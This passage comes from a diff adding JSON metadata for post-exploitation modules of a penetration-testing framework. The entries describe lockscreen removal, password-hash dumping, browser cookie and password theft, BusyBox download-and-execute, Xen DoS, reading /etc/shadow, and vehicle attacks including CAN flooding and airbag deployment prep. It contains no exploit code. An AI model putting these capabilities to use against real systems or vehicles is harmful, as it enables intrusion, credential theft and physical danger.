class.\n Any unprivileged app can exploit this vulnerability to remove the lockscreen.\n A logic flaw / design error exists in the settings application that allows an Intent from any\n application to clear the screen lock. The user may see that the Settings application has crashed,\n and the phone can then be unlocked by a swipe.\n This vulnerability was patched in Android 4.4.", + "references": [ + "CVE-2013-6271", + "URL-http://blog.curesec.com/article/blog/26.html", + "URL-http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf" + ], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 01:56:49 +0000", + "path": "/modules/post/android/manage/remove_lock.rb", + "is_install_path": true, + "ref_name": "android/manage/remove_lock", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "config-changes", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_android/manage/remove_lock_root": { + "name": "Android Root Remove Device Locks (root)", + "fullname": "post/android/manage/remove_lock_root", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "timwr" + ], + "description": "This module uses root privileges to remove the device lock.\n In some cases the original lock method will still be present but any key/gesture will\n unlock the device.", + "references": [], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 01:56:49 +0000", + "path": "/modules/post/android/manage/remove_lock_root.rb", + "is_install_path": true, + "ref_name": "android/manage/remove_lock_root", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_apple_ios/gather/ios_image_gather": { + "name": "iOS Image Gatherer", + "fullname": "post/apple_ios/gather/ios_image_gather", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Shelby Pace" + ], + "description": "This module collects images from iPhones.\n Module was tested on iOS 10.3.3 on an iPhone 5.", + "references": [], + "platform": "Apple_iOS", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 02:31:19 +0000", + "path": "/modules/post/apple_ios/gather/ios_image_gather.rb", + "is_install_path": true, + "ref_name": "apple_ios/gather/ios_image_gather", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_apple_ios/gather/ios_text_gather": { + "name": "iOS Text Gatherer", + "fullname": "post/apple_ios/gather/ios_text_gather", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Shelby Pace" + ], + "description": "This module collects text messages from iPhones.\n Tested on iOS 10.3.3 on an iPhone 5.", + "references": [], + "platform": "Apple_iOS", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 02:31:19 +0000", + "path": "/modules/post/apple_ios/gather/ios_text_gather.rb", + "is_install_path": true, + "ref_name": "apple_ios/gather/ios_text_gather", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_bsd/gather/hashdump": { + "name": "BSD Dump Password Hashes", + "fullname": "post/bsd/gather/hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bcoles " + ], + "description": "Post module to dump the password hashes for all users on a BSD system.", + "references": [], + "platform": "BSD", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 02:09:41 +0000", + "path": "/modules/post/bsd/gather/hashdump.rb", + "is_install_path": true, + "ref_name": "bsd/gather/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_firefox/gather/cookies": { + "name": "Firefox Gather Cookies from Privileged JavaScript Shell", + "fullname": "post/firefox/gather/cookies", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-26", + "type": "post", + "author": [ + "joev " + ], + "description": "This module allows collection of cookies from a Firefox Privileged JavaScript Shell.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 21:39:18 +0000", + "path": "/modules/post/firefox/gather/cookies.rb", + "is_install_path": true, + "ref_name": "firefox/gather/cookies", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_firefox/gather/history": { + "name": "Firefox Gather History from Privileged JavaScript Shell", + "fullname": "post/firefox/gather/history", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-04-11", + "type": "post", + "author": [ + "joev " + ], + "description": "This module allows collection of the entire browser history from a Firefox\n Privileged JavaScript Shell.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 21:39:18 +0000", + "path": "/modules/post/firefox/gather/history.rb", + "is_install_path": true, + "ref_name": "firefox/gather/history", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_firefox/gather/passwords": { + "name": "Firefox Gather Passwords from Privileged JavaScript Shell", + "fullname": "post/firefox/gather/passwords", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-04-11", + "type": "post", + "author": [ + "joev " + ], + "description": "This module allows collection of passwords from a Firefox Privileged JavaScript Shell.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 21:39:18 +0000", + "path": "/modules/post/firefox/gather/passwords.rb", + "is_install_path": true, + "ref_name": "firefox/gather/passwords", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_firefox/gather/xss": { + "name": "Firefox XSS", + "fullname": "post/firefox/gather/xss", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "joev " + ], + "description": "This module runs the provided SCRIPT as javascript in the\n origin of the provided URL. It works by navigating to a hidden\n ChromeWindow to the URL, then injecting the SCRIPT with Function().\n The callback \"send(result)\" is used to send data back to the listener.", + "references": [], + "platform": "Firefox", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/firefox/gather/xss.rb", + "is_install_path": true, + "ref_name": "firefox/gather/xss", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_firefox/manage/webcam_chat": { + "name": "Firefox Webcam Chat on Privileged JavaScript Shell", + "fullname": "post/firefox/manage/webcam_chat", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-05-13", + "type": "post", + "author": [ + "joev " + ], + "description": "This module allows streaming a webcam from a privileged Firefox JavaScript shell.", + "references": [ + "URL-http://www.rapid7.com/db/modules/exploit/firefox/local/exec_shellcode" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 12:21:55 +0000", + "path": "/modules/post/firefox/manage/webcam_chat.rb", + "is_install_path": true, + "ref_name": "firefox/manage/webcam_chat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/can_flood": { + "name": "CAN Flood", + "fullname": "post/hardware/automotive/can_flood", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Pietro Biondi" + ], + "description": "This module floods a CAN interface with supplied frames.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/can_flood.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/can_flood", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/canprobe": { + "name": "Module to Probe Different Data Points in a CAN Packet", + "fullname": "post/hardware/automotive/canprobe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Craig Smith" + ], + "description": "Scans between two CAN IDs and writes data at each byte position. It will\n either write a set byte value (Default 0xFF) or iterate through all possible values\n of that byte position (takes much longer). Does not check for responses and is\n basically a simple blind fuzzer.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/canprobe.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/canprobe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/diagnostic_state": { + "name": "Diagnostic State", + "fullname": "post/hardware/automotive/diagnostic_state", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jay Turla" + ], + "description": "This module will keep the vehicle in a diagnostic state on rounds by sending tester present packet.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/diagnostic_state.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/diagnostic_state", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/ecu_hard_reset": { + "name": "ECU Hard Reset", + "fullname": "post/hardware/automotive/ecu_hard_reset", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jay Turla" + ], + "description": "This module performs hard reset in the ECU Reset Service Identifier (0x11).", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/ecu_hard_reset.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/ecu_hard_reset", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/getvinfo": { + "name": "Get the Vehicle Information Such as the VIN from the Target Module", + "fullname": "post/hardware/automotive/getvinfo", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Craig Smith" + ], + "description": "This module queries DTCs, some common engine info, and vehicle information.\n\n It returns such things as engine speed, coolant temp, Diagnostic Trouble\n Codes, as well as all info stored by Mode $09 Vehicle Info, VIN, etc.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/getvinfo.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/getvinfo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/identifymodules": { + "name": "Scan CAN Bus for Diagnostic Modules", + "fullname": "post/hardware/automotive/identifymodules", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Craig Smith" + ], + "description": "Scan the CAN bus for any modules that can respond to UDS DSC queries.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/identifymodules.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/identifymodules", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/malibu_overheat": { + "name": "Sample Module to Flood Temp Gauge on 2006 Malibu", + "fullname": "post/hardware/automotive/malibu_overheat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Craig Smith" + ], + "description": "Simple sample temp flood for the 2006 Malibu.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/malibu_overheat.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/malibu_overheat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/mazda_ic_mover": { + "name": "Mazda 2 Instrument Cluster Accelorometer Mover", + "fullname": "post/hardware/automotive/mazda_ic_mover", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jay Turla" + ], + "description": "This module moves the needle of the accelorometer and speedometer of the Mazda 2 instrument cluster.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/mazda_ic_mover.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/mazda_ic_mover", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/automotive/pdt": { + "name": "Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)", + "fullname": "post/hardware/automotive/pdt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Johannes Braun", + "Juergen Duerrwang", + "Craig Smith" + ], + "description": "Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module\n will first query all Pyrotechnic Control Units (PCUs) in the target vehicle\n to discover how many pyrotechnic devices are present, then attempt to validate\n the security access token using the default simplified algorithm. On success,\n the vehicle will be in a state that is prepped to deploy its pyrotechnic devices\n (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)", + "references": [ + "CVE-2017-14937", + "URL-https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts" + ], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/automotive/pdt.rb", + "is_install_path": true, + "ref_name": "hardware/automotive/pdt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/rftransceiver/rfpwnon": { + "name": "Brute Force AM/OOK (ie: Garage Doors)", + "fullname": "post/hardware/rftransceiver/rfpwnon", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Corey Harding", + "Craig Smith" + ], + "description": "Post Module for HWBridge RFTranscievers. Brute forces AM OOK or raw\n binary signals. This is a port of the rfpwnon tool by Corey Harding.", + "references": [ + "URL-https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py" + ], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/rftransceiver/rfpwnon.rb", + "is_install_path": true, + "ref_name": "hardware/rftransceiver/rfpwnon", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/rftransceiver/transmitter": { + "name": "RF Transceiver Transmitter", + "fullname": "post/hardware/rftransceiver/transmitter", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Craig Smith" + ], + "description": "This module powers an HWBridge-connected radio transceiver,\n effectively transmitting on the frequency set by the FREQ option.\n\n NOTE: Users of this module should be aware of their local laws,\n regulations, and licensing requirements for transmitting on any\n given radio frequency.", + "references": [ + "URL-https://github.com/AndrewMohawk/RfCatHelpers" + ], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-29 01:52:00 +0000", + "path": "/modules/post/hardware/rftransceiver/transmitter.rb", + "is_install_path": true, + "ref_name": "hardware/rftransceiver/transmitter", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_hardware/zigbee/zstumbler": { + "name": "Sends Beacons to Scan for Active ZigBee Networks", + "fullname": "post/hardware/zigbee/zstumbler", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Craig Smith" + ], + "description": "Send beacon signals to the broadcast address while channel hopping.", + "references": [], + "platform": "Hardware", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 20:12:59 +0000", + "path": "/modules/post/hardware/zigbee/zstumbler.rb", + "is_install_path": true, + "ref_name": "hardware/zigbee/zstumbler", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "hwbridge" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/enum_connections": { + "name": "BusyBox Enumerate Connections", + "fullname": "post/linux/busybox/enum_connections", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. It will\n enumerate the connections established with the router or device executing BusyBox.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/enum_connections.rb", + "is_install_path": true, + "ref_name": "linux/busybox/enum_connections", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/enum_hosts": { + "name": "BusyBox Enumerate Host Names", + "fullname": "post/linux/busybox/enum_hosts", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. It will enumerate\n host names related to the device executing BusyBox.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/enum_hosts.rb", + "is_install_path": true, + "ref_name": "linux/busybox/enum_hosts", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/jailbreak": { + "name": "BusyBox Jailbreak ", + "fullname": "post/linux/busybox/jailbreak", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will send a set of commands to an open session that is connected to a\n BusyBox limited shell (i.e. a router limited shell). It will try different known\n tricks to jailbreak the limited shell and get a full BusyBox shell.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/jailbreak.rb", + "is_install_path": true, + "ref_name": "linux/busybox/jailbreak", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/ping_net": { + "name": "BusyBox Ping Network Enumeration", + "fullname": "post/linux/busybox/ping_net", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. It will ping a range\n of IP addresses from the router or device executing BusyBox.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/ping_net.rb", + "is_install_path": true, + "ref_name": "linux/busybox/ping_net", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/set_dmz": { + "name": "BusyBox DMZ Configuration", + "fullname": "post/linux/busybox/set_dmz", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. It allows to manage\n traffic forwarding to a target host through the BusyBox device.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/set_dmz.rb", + "is_install_path": true, + "ref_name": "linux/busybox/set_dmz", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/set_dns": { + "name": "BusyBox DNS Configuration", + "fullname": "post/linux/busybox/set_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. It allows\n to set the DNS server on the device executing BusyBox so it will be sent by the\n DHCP server to network hosts.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/set_dns.rb", + "is_install_path": true, + "ref_name": "linux/busybox/set_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/smb_share_root": { + "name": "BusyBox SMB Sharing", + "fullname": "post/linux/busybox/smb_share_root", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. It will modify\n the SMB configuration of the device executing BusyBox to share the root directory of\n the device.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/smb_share_root.rb", + "is_install_path": true, + "ref_name": "linux/busybox/smb_share_root", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/busybox/wget_exec": { + "name": "BusyBox Download and Execute", + "fullname": "post/linux/busybox/wget_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Vicente Vallejo" + ], + "description": "This module will be applied on a session connected to a BusyBox shell. It will use wget to\n download and execute a file from the device running BusyBox.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/busybox/wget_exec.rb", + "is_install_path": true, + "ref_name": "linux/busybox/wget_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/dos/xen_420_dos": { + "name": "Linux DoS Xen 4.2.0 2012-5525", + "fullname": "post/linux/dos/xen_420_dos", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Christoph Sendner ", + "Aleksandar Milenkoski " + ], + "description": "This module causes a hypervisor crash in Xen 4.2.0 when invoked from a\n paravirtualized VM, including from dom0. Successfully tested on Debian 7\n 3.2.0-4-amd64 with Xen 4.2.0.", + "references": [ + "CVE-2012-5525" + ], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/dos/xen_420_dos.rb", + "is_install_path": true, + "ref_name": "linux/dos/xen_420_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/ansible": { + "name": "Ansible Config Gather", + "fullname": "post/linux/gather/ansible", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module will grab ansible information including hosts, ping status, and the configuration file.", + "references": [], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/gather/ansible.rb", + "is_install_path": true, + "ref_name": "linux/gather/ansible", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/ansible_playbook_error_message_file_reader": { + "name": "Ansible Playbook Error Message File Reader", + "fullname": "post/linux/gather/ansible_playbook_error_message_file_reader", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die", + "rioasmara" + ], + "description": "This module will read the first line of a file based on an error message from ansible-playbook with sudo privileges.\n ansible-playbook takes a yaml file as input, and if there is an error, such as a non-yaml file, it outputs the line\n where the error occurs. This can be exploited to read the first line of the file, which we'll typically want to read\n /etc/shadow to obtain root's hash.", + "references": [ + "URL-https://rioasmara.com/2022/03/21/ansible-playbook-weaponization/" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/gather/ansible_playbook_error_message_file_reader.rb", + "is_install_path": true, + "ref_name": "linux/gather/ansible_playbook_error_message_file_reader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/apache_nifi_credentials": { + "name": "Apache NiFi Credentials Gather", + "fullname": "post/linux/gather/apache_nifi_credentials", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die", + "Topaco" + ], + "description": "This module will grab Apache NiFi credentials from various files on Linux.", + "references": [ + "URL-https://stackoverflow.com/questions/77391210/python-vs-ruby-aes-pbkdf2", + "URL-https://nifi.apache.org/docs/nifi-docs/html/administration-guide.html#nifi_sensitive_props_key" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/gather/apache_nifi_credentials.rb", + "is_install_path": true, + "ref_name": "linux/gather/apache_nifi_credentials", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + 